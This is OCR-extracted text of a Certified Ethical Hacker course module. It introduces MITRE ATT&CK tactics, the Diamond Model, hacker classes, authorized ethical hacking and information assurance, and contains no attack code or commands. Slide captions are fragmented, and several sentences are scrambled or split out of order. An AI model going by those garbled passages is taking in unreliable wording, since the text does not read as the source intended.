Source: https://attack.mitre.org MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. MITRE ATT&CK comprises three collections of tactics and techniques, called Enterprise, Mobile, and PRE-ATT&CK matrices, as each collection is represented in a matrix form. ATT&CK for Enterprise contains 14 categories of tactics, which are derived from the later stages (exploit, control, maintain, and execute) of the seven-stage Cyber Kill Chain. This provides a deeper level of granularity in describing what can occur during an intrusion.

Recon

Weaponize

Deliver



PRE-ATT&CK

Exploit

Control

Execute

Maintain

i

Enterprise ATT&CK Figure 1.4: MITRE Attack Framework

The following are the tactics in ATT&CK for Enterprise =

Reconnaissance

=

Resource Development

=

Initial Access

Module 01 Page 30

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Introduction to Ethical Hacking

=

Execution

=

Persistence

=

Privilege Escalation

=

Defense Evasion

=

Credential Access

=

Discovery

=

Lateral Movement

=

Collection

=

Command and Control

=

Exfiltration

=

Impact

Some MITRE ATT&CK for Enterprise Use Cases:

=

Prioritize development and acquisition efforts for computer network defense capabilities.

=

Conduct analyses of alternatives between network defense capabilities.

=

Determine “coverage” of a set of network defense capabilities.

=

Describe an intrusion chain of events based on the technique used from start to finish with a common reference.

=

Identify commonalities between adversary tradecraft, as well as distinguishing characteristics.

=

Connect mitigations, weaknesses, and adversaries.

Module 01 Page 31

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Diamond Model of Intrusion Analysis

CEH

2 The Diamond Model offers a frameworkfor identifying the clustersof events thatare correlated on any of the systems in an organization Q

Itcan control the vital atomicelement

occurring in any intrusion activity, which is referred to as the Diamond event

Using this model, efficient mitigation approaches can be developed, and analyticefficiency can be increased Adversary

Victim |

Capability

|

Meta Features of Diamond Model

Anopponent “who” was behind theattack

{| Thetarget thathas been exploited or | “where” the attack was performed

|

s

| The attack strategies or “how” the attack |

was performed

Infrastructure | “What” the adversary used to reach the | 1 victim

Deployedvia

*

|

Diamond Model of Intrusion Analysis The Diamond Model, developed by expert analysts, introduces state-of-the-art technology for intrusion analysis. This model offers a framework and a set of procedures for recognizing clusters of events that are correlated on any of the systems in an organization. The model determines the vital atomic element that occurs in any intrusion activity and is referred to as the Diamond event. Analysts can identify the events and connect them as activity threads for obtaining information regarding how and what transpired during an attack. Analysts can also easily identify whether any data are required by examining the missing features. It also offers a method or route map for analyzing incidents related to any malicious activity and predict the possibility of an attack and its origin. With the Diamond Model, more advanced and efficient mitigation approaches can be developed, and analytic efficiency can be increased. This also results in cost savings for the defender and rising cost for the adversary. The Diamond event consists of four basic features: adversary, capability, infrastructure, and victim. This model is named so because when all the features are arranged according to the relationship between them, it forms as a diamondshaped structure. Although it appears to be a simple approach, it is rather complex and requires high expertise and skill to traceroute the flow of attack.

Module 01 Page 32

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Introduction to Ethical Hacking

= Figure 1.5: Meta features of the Diamond Model

The following are the essential features of the Diamond

event

in the Diamond

Model

of

Intrusion Analysis.

Adversary: An adversary often refers to an opponent or hacker responsible for the attack event. An adversary takes advantage of a capability against the victim to perform a malicious activity for financial benefit or to damage the reputation of the victim. An adversary can be individuals such as insiders or a competitor organization. Adversaries can use many techniques to gain information such as email addresses and network assets and attempt to attack any applications used in smartphones to gain sensitive information. Victim: The victim is the target that has been exploited or the environment where the attack was performed. The adversary exploits the vulnerabilities or security loopholes in the victim’s infrastructure by using their resources. The victim can be any person, organization, institution, or even network information such as IP addresses, domain names, email addresses, and sensitive personal information of an individual. Capability: Capability refers to all the strategies, methods, and procedures associated with an attack. It can also be a malware or tool used by an adversary against the target. Capability includes simple and complex attack techniques such as brute forcing and ransomware attacks.

Infrastructure: Infrastructure refers to the hardware or software used in the network by the target that has a connection with the adversary. It refers to “what” the adversary has used to reach the victim. Consider an organization having an email server in which all the data regarding employee email IDs and other personal details are stored. The adversary can use the server as infrastructure to perform any type of attack by targeting a single employee. Exploiting infrastructure leads to data leakage and data exfiltration. Additional Event Meta-Features In the Diamond Model, an event contains some of the basic meta-features that provide additional information such as the time and source of the event. These meta-features help in linking related events, making it easier and faster for analysts to trace an attack.

Module 01 Page 33

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

The following are the features that help in connecting related events. =

Timestamp: This feature can reveal the time and date of an event. It is important as it can indicate the beginning and end of the event. It also helps in analysis and determining the periodicity of the event.

=

Phase: The phase helps in determining the progress of an attack or any malicious activity. The different phases of an attack include the phases used in the cyber kill chain framework: reconnaissance, weaponization, delivery, exploitation etc.

=

Result: The result is the outcome of any event. For example, the result of an attack can be success, failure, or unknown. It can also be segregated using security fundamentals such as confidentiality(C) compromised, integrity(1) compromised, and availability(A) compromised. CIA Compromised.

=

Direction: This feature refers to the direction of the attack. For instance, the direction can indicate how the adversary was routed to the victim. This feature can be immensely helpful when describing network-based and host-based events. The possible values for this feature include victim to infrastructure, adversary to infrastructure, infrastructure to infrastructure, and bidirectional.

=

Methodology: The methodology refers to any technique that is used by the adversary to perform an attack. This feature allows the analyst to define the overall class of action performed. Some attack techniques are spear-phishing emails, distributed denial-ofservice (DDoS) attacks, content delivery attacks, and drive-by-compromise.

=

Resource: Resource feature entails the use of external resources like tools or technology used to perform the attack. It includes hardware, software, access, knowledge, data etc.

Extended Diamond Model The extended Diamond Model also includes necessary features such as socio-political metafeatures to determine the relationship between the adversary and victim as well as technology meta-features for infrastructure and capabilities. Adversary

Social-Political

Capability

Infrastructure

Technology

Victim Figure 1.6: Extended Diamond Model of Intrusion Analysis

Module 01 Page 34

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

=

Socio-political meta-feature: The socio-political meta-feature describes the relationship between the adversary and victim. This feature is used to determine the goal or motivation of the attacker; common motivations include financial benefit, corporate espionage, and hacktivism.

=

Technology meta-feature: The technology meta-feature describes the relationship between the infrastructure and capability. This meta-feature describes how technology can enable both infrastructure and capability for communication and operation. It can also be used to analyze the technology used in an organization to identify any malicious activity.

Module 01 Page 35

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#03: Explain Hacking Concepts and Different Hacker Classes

y Prohibited.

Hacking Concepts This section deals with basic concepts of hacking: what is hacking, who is a hacker, and hacker classes.

Module 01 Page 36

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

C'EH

What is Hacking?

@

Hacking refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to a system’s resources

@

Itinvolves modifying system or application features to achieve a goal outside of the creator’s original purpose

‘@

A? -

Hacking can be used to steal and redistribute intellectual property, leading tobusiness

loss

What is Hacking? Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves a modifying system or application features to achieve a goal outside its creator’s original purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, thus leading to business loss. Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motive behind hacking could be to steal critical information or services, for thrill, intellectual challenge, curiosity, experiment, knowledge, financial gain, prestige, power, peer recognition, vengeance and vindictiveness, among other reasons.

Module 01 Page 37

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Who is a Hacker? 01 An intelligent individual with

excellent computer skills who can create and explore computer software and hardware

CE H 02

03

For some hackers, hacking is a

hobby to see how many computers or networks they can compromise 7G

Oo

Some hackers’ intentions can

either be to gain knowledge or to probe and do illegal things

cam

Some hack with malicious intent such as to steal business data, credit card information, social security numbers, email passwords, and other sensitive data

Who is a Hacker? A hacker is a person who breaks into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. A hacker is an intelligent individual with excellent computer skills, along with the ability to create and explore the computer’s software and hardware. Usually, a hacker is a skilled engineer or programmer with enough knowledge to discover vulnerabilities in a target system. They generally have subject expertise and enjoy learning the details of various programming languages and computer systems. For some hackers, hacking is a hobby to see how many computers or networks they can compromise. Their intention can either be to gain knowledge or to poke around to do illegal things. Some hack with malicious intent behind their escapades, like stealing business data, credit card information, social security numbers, and email passwords.

Module 01 Page 38

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Hacker Classes

@

@

Gray Hats

Black Hats

White Hats

Individuals with extraordinary computing skills; they resortto malicious or destructive activities and are also known as crackers

Individuals who use their professed hacking skills for defensive purposes and are also known as security analysts. They have permission from the system owner

@

offensively and defensively at various times

@

@

Cyber Terrorists

An unskilled hacker who compromises a system by running scripts, tools, and software that were developed by real hackers

Individuals who aim to bring down the critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment

Individuals who work both

@

Script Kiddies

Suicide Hackers

State-Sponsored Hackers

Individuals with wide range of skills who are motivated by religious or political beliefs to create fear through the largescale disruption of computer networks

Hacktivist

Individuals employed by the government to penetrate and gain top-secret information from and do damage to the information systems of other governments

Individuals who promote a political agenda by hacking, especially by using hacking to deface or disable website

served. Reproduction is Strictly Prohibited

CEH

Hacker Classes (Cont’d)

@

&

Industrial Spies

Hacker Teams

A consortium of skilled hackers having their own resources and funding. They work together in synergy for researching the state-of-the-art technologies

Insider

Individuals who perform corporate espionage by illegally spying on competitor organizations and focus on stealing information such as blueprints and formulas

12]

Criminal Syndicates

Groups of individuals that are involved in organized, planned, and prolonged criminal activities. They illegally embezzle money by performing sophisticated cyber-attacks

‘Any trusted person who has access to critical assets of an organization. They use privileged access to violate rules or intentionally cause harm to the organization's information system

Organized Hackers Miscreants or hardened criminals who use rented

devices or botnets to perform various cyber-attacks to pilfer money from victims cerved. Reproduction is Strictly Prohibited

Hacker Classes Hackers usually fall into one of the following categories, according to their activities: =

Black Hats: Black hats are individuals who use their extraordinary computing skills for illegal or malicious purposes. This category of hacker is often involved in criminal activities. They are also known as crackers.

Module 01 Page 39

al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking =

Exam 312-50 Certified Ethical Hacker

White Hats: White hats or penetration testers are individuals who use their hacking skills for defensive purposes. These days, almost every organization has security analysts who are knowledgeable about hacking countermeasures, which can secure its network and information systems against malicious attacks. They have permission from the

system owner. =

Gray Hats: Gray hats are the individuals who work various times. Gray hats might help hackers to find network and, at the same time, help vendors hardware) by checking limitations and making them

=

Suicide Hackers: Suicide hackers are individuals who aim to bring down critical infrastructure for a “cause” and are not worried about facing jail terms or any other kind of punishment. Suicide hackers are similar to suicide bombers who sacrifice their life for an attack and are thus not concerned with the consequences of their actions.

=

Script Kiddies: Script kiddies are unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They usually focus on the quantity rather than the quality of the attacks that they initiate. They do not have a specific target or goal in performing the attack and simply aim to gain popularity or prove their technical skills.

=

Cyber Terrorists: Cyber terrorists are individuals with a wide range of skills, motivated by religious or political beliefs, to create fear of large-scale disruption of computer networks.

=

State-Sponsored Hackers: State-sponsored hackers are skilled individuals having expertise in hacking and are employed by the government to penetrate, gain top-secret information from, and damage the information systems of other government or military organizations. The main aim of these threat actors is to detect vulnerabilities in and exploit a nation’s infrastructure and gather intelligence or sensitive information.

=

Hacktivist: Hacktivism is a form of activism in which hackers break into government or corporate computer systems as an act of protest. Hacktivists use hacking to increase awareness of their social or political agendas, as well as to boost their own reputations in both online and offline arenas. They promote a political agenda especially by using hacking to deface or disable websites. In some incidents, hacktivists may also obtain and reveal confidential information to the public. Common hacktivist targets include government agencies, financial institutions, multinational corporations, and any other entity that they perceive as a threat. Irrespective of hacktivists’ intentions, the gaining of unauthorized access is a crime.

=

Hacker Teams: A hacker team is a consortium of skilled hackers having their own resources and funding. They work together in synergy for researching state-of-the-art technologies. These threat actors can also detect vulnerabilities, develop advanced tools, and execute attacks with proper planning.

Module 01 Page 40

both offensively and defensively at various vulnerabilities in a system or to improve products (software or more secure.

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

=

Industrial Spies: Industrial spies are individuals who perform corporate espionage by illegally spying on competitor organizations. They focus on stealing critical information such as blueprints, formulas, product designs, and trade secrets. These threat actors use advanced persistent threats (APTs) to penetrate a network and can also stay undetected for years. In some cases, they may use social engineering techniques to steal sensitive information such as development plans and marketing strategies of the target company, which can result in financial loss to that company.

=

Insiders: An insider is any employee (trusted person) who has access to critical assets of an organization. An insider threat involves the use of privileged access to violate rules or intentionally cause harm to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. Generally, insider threats arise from disgruntled employees, terminated employees, and undertrained staff members.

=

Criminal Syndicates: Criminal syndicates are groups of individuals or communities that are involved in organized, planned, and prolonged criminal activities. They exploit victims from distinct jurisdictions on the Internet, making them difficult to locate. The main aim of these threat actors is to illegally embezzle money by performing sophisticated cyber-attacks and money-laundering activities.

=

Organized Hackers: Organized hackers are a group of hackers working together in criminal activities. Such groups are well organized in a hierarchical structure consisting of leaders and workers. The group can also have multiple layers of management. These hackers are miscreants or hardened criminals who do not use their own devices; rather, they use rented devices or botnets and crimeware services to perform various cyberattacks to pilfer money from victims and sell their information to the highest bidder. They can also swindle intellectual property, trade secrets, and marketing plans; covertly penetrate the target network; and remain undetected for long periods.

Module 01 Page 41

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#04: Explain Ethical Hacking Concepts and Scope

Copyright © by

Al Rights Reser

Ethical Hacking Concepts An ethical hacker follows processes similar to those of a malicious hacker. The steps to gain and maintain access to a computer system are similar irrespective of the hacker’s intentions. This section provides an overview of ethical hacking, why ethical hacking is necessary, the scope and limitations of ethical hacking, and the skills of an ethical hacker.

Module 01 Page 42

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

What is Ethical Hacking? @ Ethical hacking involves the use of hacking tools, tricks, and techniques to identify vulnerabilities and ensure system security

@ It focuses on simulating the techniques used by attackers to verify the existence of exploitable vulnerabilities in a system’s security

@ Ethical hackers perform security assessments for an organization with the permission of concerned authorities

Conyrieht © by

Lt

oe

E]

RightsReserved, Reproduction is Strictly Prohibited

What is Ethical Hacking? Ethical hacking is the practice of employing computer and network skills in order to assist organizations in testing their network security for possible loopholes and vulnerabilities. White Hats (also known as security analysts or ethical hackers) are the individuals or experts who perform ethical hacking. Nowadays, most organizations (such as private companies, universities, and government organizations) are hiring White Hats to assist them in enhancing their cybersecurity. They perform hacking in ethical ways, with the permission of the network or system owner and without the intention to cause harm. Ethical hackers report all vulnerabilities to the system and network owner for remediation, thereby increasing the security of an organization’s information system. Ethical hacking involves the use of hacking tools, tricks, and techniques typically used by an attacker to verify the existence of exploitable vulnerabilities in system security. Today, the term hacking is closely associated with illegal and unethical activities. There is continuing debate as to whether hacking can be ethical or not, given the fact that unauthorized access to any system is a crime. Consider the following definitions: =

The noun “hacker” refers to a person who systems and stretching their capabilities.

enjoys

learning the details of computer

=

The verb “to hack” describes the rapid development of new programs or the reverse engineering of existing software to make it better or more efficient in new and innovative ways.

=

The terms “cracker” and “attacker” refer to persons who employ their hacking skills for offensive purposes.

Module 01 Page 43

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking =

Exam 312-50 Certified Ethical Hacker

The term “ethical hacker” refers to security professionals who skills for defensive purposes.

employ

their hacking

Most companies employ IT professionals to audit their systems for known vulnerabilities. Although this is a beneficial practice, crackers are usually more interested in using newer, lesser-known vulnerabilities, and so these by-the-numbers system audits do not suffice. A company needs someone who can think like a cracker, keep up with the newest vulnerabilities and exploits, and recognize potential vulnerabilities where others cannot. This is the role of the ethical hacker. Ethical hackers exception that administrators patching those

usually employ the same tools and techniques as hackers, with the important they do not damage the system. They evaluate system security, update the regarding any discovered vulnerabilities, and recommend procedures for vulnerabilities.

The important distinction between ethical hackers and crackers is consent. Crackers attempt to gain unauthorized access to systems, while ethical hackers are always completely open and transparent about what they are doing and how they are doing it. Ethical hacking is, therefore, always legal.

Module 01 Page 44

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Why Ethical Hacking is Necessary To beat a hacker, you need to think like one!

Ethical hacking is necessary as it allows for counter attacks against malicious hackers through anticipating the methods used to break into the system

Reasons why organizations recruit ethical hackers

To prevent hackers from gaining access to the organization’s information systems

To provide adequate preventive measures in order to avoid security breaches

Topotential uncoveras vulnerabilities 9 security risk in systems and explore their

To help safeguard customer data

To analyze and strengthen an organization’s security posture, including policies, network protection infrastructure, and end-user practices

To enhance security awareness at all levels in a business

CEH

Why Ethical Hacking is Necessary (Cont’d) Ethical Hackers Try to Answer the Following Questions

@ _ what can an intruder see on the target system? (Reconnaissance and Scanning phases) ©

what can an intruder do with that information? (Gaining Access and Maintaining Access phases) Does anyone at the target organization notice the intruders’ attempts or successes? (Reconnaissance and Covering Tracks phases)

Are all components of the information systemadequately protected, updated, and patched? How much time, effort, and money are required to obtain adequate protection? Are the information security measures in compliance with legal and industry standards? Al Rights Reserved. Reproduction i

Why Ethical Hacking is Necessary As technology is growing at a faster pace, so is the growth beat a hacker, it is necessary to think like one!

in the risks associated with it. To

Ethical hacking is necessary as it allows to counter attacks from malicious hackers by anticipating methods used by them to break into a system. Ethical hacking helps to predict various possible vulnerabilities well in advance and rectify them without incurring any kind of

Module 01 Page 45

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

outside attack. As hacking involves creative thinking, vulnerability testing, and security audits alone cannot ensure that the network is secure. To achieve security, organizations must implement a “defense-in-depth” strategy by penetrating their networks to estimate and expose vulnerabilities. Reasons why organizations recruit ethical hackers =

To prevent hackers from gaining access to the organization’s information systems

=

To uncover vulnerabilities in systems and explore their potential as a risk

=

To analyze and strengthen an organization’s security posture, including policies, network protection infrastructure, and end-user practices

=

To provide adequate preventive measures in order to avoid security breaches

=

To help safeguard the customer data

=

To enhance security awareness at all levels in a business

An ethical hacker’s evaluation of a client’s information system security seeks to answer three basic questions: 1.

What can an attacker see on the target system? Normal security checks by system administrators will often overlook vulnerabilities. The ethical hacker has to think about what an attacker might see during the reconnaissance and scanning phases of an attack.

2.

What can an intruder do with that information? The ethical hacker must discern the intent and purpose behind attacks to determine appropriate countermeasures. During the gaining-access and maintaining-access phases of an attack, the ethical hacker needs to be one step ahead of the hacker in order to provide adequate protection.

3.

Are the attackers’ attempts being noticed on the target systems? Sometimes attackers will try to breach a system for days, weeks, or even months. Other times they will gain access but will wait before doing anything damaging. Instead, they will take the time to assess the potential use of exposed information. During the reconnaissance and covering tracks phases, the ethical hacker should notice and stop the attack.

After carrying out attacks, hackers may clear their tracks by modifying log files and creating backdoors, or by deploying trojans. Ethical hackers must investigate whether such activities have been recorded and what preventive measures have been taken. This not only provides them with an assessment of the attacker’s proficiency but also gives them insight into the existing security measures of the system being evaluated. The entire process of ethical hacking and subsequent patching of discovered vulnerabilities depends on questions such as: =

What is the organization trying to protect?

=

Against whom or what are they trying to protect it?

Module 01 Page 46

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

=

Are all the components of the information system adequately protected, updated, and patched?

=

How much time, effort, and money is the client willing to invest to gain adequate protection?

=

Do the information security measures comply with industry and legal standards?

Sometimes, in order to save on resources or prevent further discovery, the client might decide to end the evaluation after the first vulnerability is found; therefore, it is important that the ethical hacker and the client work out a suitable framework for investigation beforehand. The client must be convinced of the importance of these security exercises through concise descriptions of what is happening and what is at stake. The ethical hacker must also remember to convey to the client that it is never possible to guard systems completely, but that they can always be improved.

Module 01 Page 47

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

C'EH

Scope and Limitations of Ethical Hacking Scope

Limitations

@ Ethical hacking is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices

@ Unless the businesses already know what they are looking for and why they are hiring an outside vendor to hack systems in the first

@ Itis used to identify risks and highlight remedial actions. It also reduces ICT costs by resolving vulnerabilities

@ Anethical hacker can only help the organization

there would toplace, gain chances from theareexperience

not be much

to better understand its security system; it is up

to the organization to place the right safeguards on the network

Bs

Lela

Scope and Limitations of Ethical Hacking Security experts broadly categorize computer crimes into two categories: crimes facilitated by a computer and those in which the computer is the target.

Ethical hacking is a structured and organized security assessment, usually as part of a penetration test or security audit, and is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices. It is used to identify risks and highlight remedial actions. It is also used to reduce Information and Communications Technology (ICT) costs by resolving vulnerabilities. Ethical hackers determine the scope of the security assessment according to the client’s security concerns. Many ethical hackers are members of a “Tiger Team.” A tiger team works together to perform a full-scale test covering all aspects of the network, as well as physical and system intrusion.

An ethical hacker should know the penalties of unauthorized hacking into a system. No ethical hacking activities associated with a network-penetration test or security audit should begin before receiving a signed legal document giving the ethical hacker express permission to perform the hacking activities from the target organization. Ethical hackers must be judicious with their hacking skills and recognize the consequences of misusing those skills. The ethical hacker must follow certain rules to fulfill their ethical and moral obligations. They must do the following: =

Gain

authorization

from

the

client

and

have

a

signed

contract

giving

the

tester

permission to perform the test.

Module 01 Page 48

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Maintain confidentiality when performing the test and follow a Nondisclosure Agreement (NDA) with the client for the confidential information disclosed during the test. The information gathered might contain sensitive information, and the ethical hacker must not disclose any information about the test or the confidential company data to a third party. Perform the test up to but not beyond the agreed-upon limits. For example, ethical hackers should perform DoS attacks only if they have previously agreed upon this with the client. Loss of revenue, goodwill, and worse consequences could befall an organization whose servers or applications are unavailable to customers because of the testing. The following steps provide a framework for performing a security audit of an organization, which will help in ensuring that the test is organized, efficient, and ethical: Talk to the client and discuss the needs to be addressed during the testing Prepare and sign NDA documents with the client Organize an ethical hacking team and prepare the schedule for testing

Conduct the test Analyze the results of the testing and prepare a report Present the report findings to the client However, there are limitations too. Unless the businesses first know what they are looking and why they are hiring an outside vendor to hack their systems in the first place, chances there would not be much to gain from experience. An ethical hacker, thus, can only help organization to better understand its security system. It is up to the organization to place right safeguards on the network.

Module 01 Page 49

for are the the

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Skills of an Ethical Hacker

Technical Skills

In-depth knowledge of major operating environments such as Windows, Unix, Linux, and Macintosh In-depth knowledge of networking concepts, technologies, and related hardware and software Acomputer expert adept at technical domains

Knowledgeable about security areas and related issues

CE H

2

Non-Technical Skills

© The abilityto learn and adopt new technologies quickly © Strong work ethics and good problem solving and communication skills © Committed to the organization’s security policies © Anawareness of local standards and laws

“High technical” knowledge for launching sophisticated

attacks

Skills of an Ethical Hacker It is essential for an ethical hacker to acquire the knowledge and skills to become an expert hacker and to use this knowledge in a lawful manner. The technical and non-technical skills to be a good ethical hacker are discussed below: Technical Skills o

In-depth knowledge of major operating environments, such as Windows, Unix, Linux, and Macintosh

o

In-depth knowledge of networking concepts, technologies, and related hardware

and software

o

Acomputer expert adept at technical domains

o

The knowledge of security areas and related issues

o

High technical knowledge of how to launch sophisticated attacks

Non-Technical Skills o

The ability to quickly learn and adapt new technologies

o

Astrong work ethic and good problem solving and communication skills

o

Commitment to an organization’s security policies

o

Anawareness of local standards and laws

Module 01 Page 50

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#05: Summarize the Techniques used in Information Security Controls

All RightsReserved. Reproductioni Strictly Prohibited.

Information Security Controls Information security controls prevent the occurrence of unwanted events and reduce risk to the organization’s information assets. The basic security concepts critical to information on the Internet are confidentiality, integrity, and availability; the concepts related to the persons accessing the information are authentication, authorization, and non-repudiation. Information is the greatest asset of an organization. It must be secured using various policies, creating awareness, employing security mechanisms, or by other means. This section deals with Information defense-in-depth, risk management, management, and Al and ML concepts.

Module 01 Page 51

Assurance (IA), continual/adaptive security cyber threat intelligence, threat modeling,

strategy, incident

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Information Assurance (IA)

CE H

@ lA refers to the assurance that the integrity, availability, confidentiality, and authenticity of information and information systems is protected during the usage, processing, storage, and transmission of information @

Some of the processes that help in achieving information assurance include:

e

Developing local policy, process, and guidance

©

creating plans for identified resource requirements

©

vesigning network and user authentication strategies

Applying appropriate information assurance controls

(3)

Identifying network vulnerabilities and threats

Performing certification and accreditation

@

icentifying problem and resource requirements

Providing information assurance training

Information Assurance (IA) IA refers to the assurance of the integrity, availability, confidentiality, and authenticity of information and information systems during the usage, processing, storage, and transmission of information. Security experts accomplish information assurance with the help of physical, technical, and administrative controls. Information Assurance and Information Risk Management (IRM) ensure that only authorized personnel access and use information. This helps in achieving information security and business continuity. Some of the processes that help in achieving information assurance include: =

Developing local policy, process, and guidance in such a way to maintain the information systems at an optimum security level

=

Designing network and user authentication strategy—Designing a secure network ensures the privacy of user records and other information on the network. Implementing an effective user authentication strategy secures the information system’s data

=

Identifying network vulnerabilities and threats—Vulnerability assessments outline the security posture of the network. Performing vulnerability assessments in search of network vulnerabilities and threats help to take the proper measures to overcome them

=

Identifying problems and resource requirements

=

Creating a plan for identified resource requirements

=

Applying appropriate information assurance controls

=

Performing the Certification and Accreditation (C&A) process of information helps to trace vulnerabilities, and implement safety measures to nullify them

Module 01 Page 52

systems

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking =

Exam 312-50 Certified Ethical Hacker

Providing information assurance training to all personnel in federal organizations brings among them an awareness of information technology

Module 01 Page 53

and

private

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Continual/Adaptive Security Strategy

CE H

eanizationsshould adopt adaptive security strategy, which involvesimplementingall the four network security approaches QO The adaptive security strategy consists of four security activities corresponding to each security approach 2

nO,

0)

tose)

Predict

Protect

> Defense-in-depth Security Strategy

> Risk and Vulnerability Assessment

"=

> Attack Surface Analysis

=

> Threat intelligence 8

Protect network

+ Protect data

Respond

Eat

Protect endpoints

Detect

> Incident Response

Continual/Adaptive Security Strategy The adaptive security strategy prescribes that continuous prediction, prevention, detection, and response actions must be taken to ensure comprehensive computer network defense. Protection: This includes a set of prior countermeasures taken towards eliminating all the possible vulnerabilities on the network. It includes security measures such as security policies, physical security, host security, firewall, and IDS. Detection: Detection involves assessing the network for abnormalities such as attacks, damages, unauthorized access attempts, and modifications, and identifying their locations in the network. It includes the regular monitoring of network traffic using network monitoring and packet sniffing tools. Responding: Responding to incidents involves actions such as identifying incidents, finding their root causes, and planning a possible course of actions for addressing them. It includes incident response, investigation, containment, impact mitigation, and eradication steps for addressing the incidents. It also includes deciding whether the incident is an actual security incident or a false positive. Prediction:

Prediction

involves

the

identification

of

potential

attacks,

targets,

and

methods prior to materialization to a viable attack. Prediction includes actions such as conducting risk and vulnerability assessment, performing attack surface analysis, consuming threat intelligence data to predict future threats on the organization.

Module 01 Page 54

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Predict

Protect

